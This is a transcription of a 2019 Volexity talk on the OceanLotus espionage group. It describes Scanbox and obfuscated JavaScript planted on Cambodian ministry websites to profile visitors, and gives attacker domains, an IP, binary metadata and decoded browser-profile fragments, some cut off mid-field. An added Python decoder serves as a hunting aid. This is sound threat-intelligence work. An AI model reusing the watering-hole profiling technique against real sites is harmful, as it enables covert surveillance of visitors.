OceanLotus Digital Surveillance And Cyberespionage At Scale

Transcription

Volexity Cyber Sessions, September 2019

OceanLotus
Digital Surveillance and Cyberespionage at Scale
Steven Adair, Volexity
Volexity Cyber Sessions, Reston, VA, September 25, 2019

Background
§ In May 2015, Chinese cybersecurity company Qihoo 360 releases a report on a threat group they call OceanLotus.
§ Report detailed targeted attacks against Chinese government agencies, maritime institutions, research organizations, and shipping enterprises since 2012.
§ Attacks are described as state-sponsored, but no nation named as a likely culprit.

OceanLotus & Mac Malware
§ In the initial report from Qihoo 360, references to Mac malware were made.
§ In February 2016, samples were publicly analyzed by researchers at AlienVault, revealing advanced malware capabilities targeting OS X.
§ The malware is identified as having several encryption routines, anti-debugging capabilities, and built-in capabilities to support executing commands and applications, terminating processes, removing files, etc.
Ref: to-be-an-adobe-flashupdate

OceanLotus Vietnamese?
§ In May 2017, FireEye publishes a blog describing several new OceanLotus spear phishing messages, malicious attachments, and backdoors.
  ‣ Multiple new backdoors with different capabilities and command and control protocols are detailed.
§ FireEye describes several targets and victims of OceanLotus campaigns that have a theme in common:
  ‣ Not Vietnamese
  ‣ Have business or other interests specifically pertaining to Vietnam
§ OceanLotus effectively outed/named as being a Vietnamese APT group.
  ‣ The blog also tied OceanLotus to an EFF blog from 2014 where Vietnamese activists/bloggers were targeted with malware.
Ref: 05/cyber-espionage-apt32.html

Massive Tracking Campaign Uncovered
§ In November 2017, Volexity releases blog describing massive OceanLotus spying campaign.
§ Strategic Web Compromised sites:
  ‣ Chinese Shipping/Oil
  ‣ LA / KH / PH Government
  ‣ VN / US / etc. Human Rights/NGO (with Vietnamese Focus)

The Next Wave of OceanLotus
The Accidental Discovery of Mass Surveillance

Scanbox!
§ On a nice spring day in 2017, we received a Scanbox alert from a customer’s web browsing activity.
§ Quick intro or refresher on Scanbox.
  ‣ PHP and JavaScript framework designed to profile and “exploit” visitors of a website
  ‣ Has multiple plugins that support examining the browser, browser plugins, installed software, and report various details
  ‣ Also has keylogger functionality (see our Virtual Private Keylogging blog)
§ Scanbox is primarily used by Chinese APT groups.

MFAIC Cambodia
§ Examination of the alert reveals two key items:
  ‣ Alert is being triggered for connections back to the domain ajax-js[.]com
  ‣ Referring (compromised) URL is from www.mfaic.gov[.]kh, The Ministry of Foreign Affairs and International Cooperation in Cambodia
§ Scanbox in the wild is always interesting to see.
  ‣ Threat actor has breached MFAIC and installed Scanbox
  ‣ Further targeting organizations that would visit Cambodian MFA website

Scanbox in ect.min.js?ver 2.0

Earlier Activity and New Investigations
§ Just two weeks earlier, we had identified a different Scanbox URL on the website of the Ministry of the Interior (www.interior.gov.kh).
  ‣ 5.104.105.194/adminxx5xx/
§ Start proactively taking a look at KH Government websites
  ‣ The Ministry of Foreign Affairs (MFA) – www.mfa.gov.kh
  ‣ The findings were... interesting

Directory Listing On and Interesting Files

64-bit Binaries - Leviathan/GreenCrew/APT 40

File Name : cript.dat
Directory : .
File Size : 26 kB
File Modification Date/Time : 2017:05:12 02:06:49-04:00
File Access Date/Time : 2018:02:26 18:36:31-05:00
File Inode Change Date/Time : 2017:06:21 01:05:24-04:00
File Permissions : rw-r--r-
File Type : Win64 EXE
MIME Type : application/octet-stream
Machine Type : AMD AMD64
Time Stamp : 2014:09:01 04:00:24-04:00
PE Type : PE32

strings -e l msbuild.log
%s\*%s\%scmd.exesvchost.exekernel32%d %d.%d.%d %s%d Core %.2f GHz%.2f GBnull[Green] pid %d tid %d modulePath %s modulePath modulePath %[ ]

Interesting JavaScript File
§ Closer look at the file /jwplayer.js reveals:
§ Obfuscated JS that loads more JS from the following URL:
  ‣ http://s.jscore-group.com/js/jwp.js

Examining HTTP Activity
§ The JS was designed to blend in and look like it is a legitimate part of the website’s JW Player plugin.
§ Pulled all related traffic from system accessing the KH MFA website.
§ Request for jwp.js showed the file was pretty large – approximately 48 KB.
§ Network traffic showed follow-on HTTP requests that were particularly interesting.

HTTP Activity Cont’d
§ A follow on URL from s.jscore-group.com was requested: https://health-ray-id.com/robot.txt
  ‣ Text file with a constantly changing GUID value. Example: 2223f4b74d-5db0-40a7-8755-bf1d257aa513
§ Followed by a few more interesting requests
  IyJTNBJTIyJTIyJTdE/adFeedback.js

Next Request
http://s.jscoregroup.com/sync/[long Base64 string]/img blank.gif

URLs
§ Yes that last URL was as crazy as it looks.
§ Turns out all of this JavaScript is formulating URLs full of base64.
§ Let’s decode them
  ‣ First URL -8755bf1d257aa513%22%2C%22hash%22%3A%22%22%7D

Long URL
%3Afalse%7D%2C%22 2 D%5D%2C%22 ication/x-google-chrome-pdf%22%7D%5D%7D%7D
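The decoding step from the URLs slide, as an added Python example (not code from the presentation). It assumes the path segment is Base64 over JavaScript escape()-style text (`%XX` and `%uXXXX`) wrapping JSON, which is consistent with the percent-encoded JSON fragments shown on the slides; the host `collector.example`, the sample field values and the helper `build_sample_url` are constructed for illustration.

```python
import base64
import binascii
import json
import re
from urllib.parse import unquote, urlsplit

_U_ESCAPE = re.compile(r"%u([0-9A-Fa-f]{4})")


def js_unescape(text):
    """Undo JavaScript escape(): %uXXXX code units first, then %XX bytes."""
    text = _U_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), text)
    text = unquote(text, encoding="latin-1")
    # %uXXXX values are UTF-16 code units; rejoin any surrogate pairs.
    return text.encode("utf-16", "surrogatepass").decode("utf-16", "replace")


def decode_profile(url):
    """Return the JSON object carried in a URL path segment, or None."""
    for segment in urlsplit(url).path.split("/"):
        if len(segment) < 16:  # too short to carry a profile
            continue
        padded = segment + "=" * (-len(segment) % 4)
        try:
            raw = base64.b64decode(padded, validate=True)
            obj = json.loads(js_unescape(raw.decode("ascii")))
        except (binascii.Error, ValueError):
            continue  # ordinary path segment, not an encoded profile
        if isinstance(obj, dict):
            return obj
    return None


def build_sample_url():
    """Constructed sample input: encode a made-up profile the same way."""
    profile = {"title": "\u1780\u17d2 demo", "hash": "", "webrtc": True, "resolution": "1536x864"}
    text = json.dumps(profile, ensure_ascii=False, separators=(",", ":"))
    escaped = "".join(
        c if c.isascii() and (c.isalnum() or c in "@*_+-./")
        else f"%{ord(c):02X}" if ord(c) < 256 else f"%u{ord(c):04X}"
        for c in text
    )
    blob = base64.b64encode(escaped.encode("ascii")).decode("ascii")
    return f"http://collector.example/sync/{blob}/blank.gif"


if __name__ == "__main__":
    print(decode_profile(build_sample_url()))
```

Run over proxy or web-gateway URLs, `decode_profile` returns `None` for ordinary requests and the decoded object for requests that carry an encoded profile, so it doubles as a hunting filter.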

Cleaned Up
","appVersion":"5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like pt":false,"vlc":false,"webrtc":true,"wmp":false}," 36,"availHeight":824,"resolution":"1536x864"}," plugins":[{"description":"Enables Widevine licenses for playback of HTML audio/video content. r.dll","length":1,"name":"Widevine Content :"Chrome description":"Portable Document ,"name":"Chrome PDF Viewer"}]," mimeTypes":[{"description":"Widevine Content Decryption type":"application/pdf"},{"description":"Native n/x-nacl"},{"description":"Portable Native n/x-pnacl"},{"description":"Portable on/x-google-chrome-pdf"}]}}

More URLs
§ A few more similar URLs are accessed to send back information, including the following:
  http://s.jscoregroup[.]com/sync/[long Base64 string]
